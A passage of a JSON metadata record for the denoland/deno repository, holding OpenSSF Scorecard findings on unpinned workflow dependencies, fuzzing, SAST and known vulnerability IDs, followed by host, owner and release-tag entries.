using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/t